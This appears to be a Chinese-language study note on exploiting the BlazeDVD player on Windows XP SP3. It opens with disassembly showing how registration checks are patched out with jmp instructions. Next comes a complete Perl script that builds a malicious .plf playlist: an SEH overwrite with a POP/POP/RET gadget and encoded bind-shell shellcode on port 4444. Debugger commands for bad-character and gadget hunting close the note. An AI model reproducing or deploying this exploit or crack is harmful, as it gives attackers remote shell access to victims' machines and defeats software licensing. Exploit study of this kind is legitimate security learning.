随便下载的 BlazeDVD 版本 来实验················
XP SP3 无DEP
首先程序破解:
很简单 直接搜搜字符串 修改几个jmp 即可成功
6030324B . /E9 35030000 jmp Configur.60303585 60303250 > |68 C0003460 push Configur.603400C0 ; IsRegistered1 60303255 . |57 push edi 60303256 . |E8 15570100 call Configur.60318970 6030325B . |83C4 08 add esp,0x8 6030325E . |85C0 test eax,eax 60303260 |E9 93000000 jmp Configur.603032F8 //jmp
603033A1 > 68 A87A3460 push Configur.60347AA8 ; IsRegistered3 603033A6 . 57 push edi 603033A7 . E8 C4550100 call Configur.60318970 603033AC . 83C4 08 add esp,0x8 603033AF . 85C0 test eax,eax 603033B1 E9 94000000 jmp Configur.6030344A //jmp 603033B6 90 nop
6030344A > 68 947A3460 push Configur.60347A94 ; IsPlaybackTimeOut 6030344F . 57 push edi 60303450 . E8 1B550100 call Configur.60318970 60303455 . 83C4 08 add esp,0x8 60303458 . 85C0 test eax,eax 6030345A EB 1B jmp XConfigur.60303477
60303477 > 57 push edi 60303478 . 8D4E E8 lea ecx,dword ptr ds:[esi-0x18] 6030347B . E8 E0280000 call Configur.60305D60 60303480 . 8BD8 mov ebx,eax 60303482 . 83FB FF cmp ebx,-0x1 60303485 EB 07 jmp XConfigur.6030348E 60303487 . 33C0 xor eax,eax 60303489 . E9 F7000000 jmp Configur.60303585 6030348E > 68 E0773460 push Configur.603477E0 ; AutoResumeMode 60303493 . 57 push edi
PERL脚本:
my $file = "test.plf";
#0x1000ecfa pop ebx; pop ebp; ret
#0x1000ef4a pop esi; pop ebp; ret
#0x1000f00e pop edi; pop esi; ret
#0x100101e7 pop esi; pop ecx; ret
#0x1001028f pop esi; pop ebx; retn 0x0010
#0x100104d7 pop ebx; pop ecx; retn 0x000c
#0x10010511 pop esi; pop ebx; retn 0x000c
#0x1001058a pop ebp; pop ebx; retn 0x0010
#0x10010595 pop ebp; pop ebx; retn 0x0010
#0x1001059f pop ebp; pop ebx; retn 0x0010
#0x100105f1 pop esi; pop ebx; retn 0x000c
my $junk = "xcc"x608;
my $nseh = "xebx1ex90x90";
my $seh = pack('V',0x10010511);
my $prejunk = "x90"x30;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
#x1a
my $shellcode =
"xD9xEE".
"xD9x74x24xF4".
"x58".
"x83xC0x1b".
"x33xC9".
"x8Ax1Cx08" .
"x80xF3x11".
"x88x1Cx08".
"x41" .
"x80xFBx90".
"x75xF1".
"xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d".
"x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42".
"x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a".
"x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84".
"xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48".
"x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b".
"xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64".
"xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12".
"x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca".
"x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41".
"x42xeex46xedx42xeex46xe9x81";
my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;
open($FILE,">$file");
print $FILE $payload;
close($FILE);
下面学习检查可能存在的 bad characters
!load byakugan
!jutsu memDiff file 302 c:sploitsshell.txt 0x0012f5de
shellcode长度 + 包含shellcode的文件+ 内存中 的起始地址
粗字体为 不同的地方
我将上面的shellcode "xee" 全改为了 "xcc" 检查如下:
!load byakugan
!jutsu identBuf file myShell c:shell.txt
!jutsu identBuf msfpattern myBuffer 608
!jutsu listBuf
!searchcode jmp esp 可以显示 模块属性 DEP寻找特殊代码时要用!!!!!!!!!!!!!!!
!aslrdynamicbase 查看随机分布的模块
!pvefindaddr j jmp/call ret 组合
jseh 用于绕过 SAFESEH 保护时特别有用
nosafeseh 未经saffeseh保护的模块
!packets 用于捕获无线数据包 打开网页 附加 !packet 继续运行 查看 captured Packets 窗口
!safeseh 列出可执行模块,并提示是否受 safeseh保护 !safeseh 命令
!mona bytearray ······················· 可以生成 00-ff 去检测bad character
找寻 shellcode 位置 !mona cmp -f c:1egg1.bin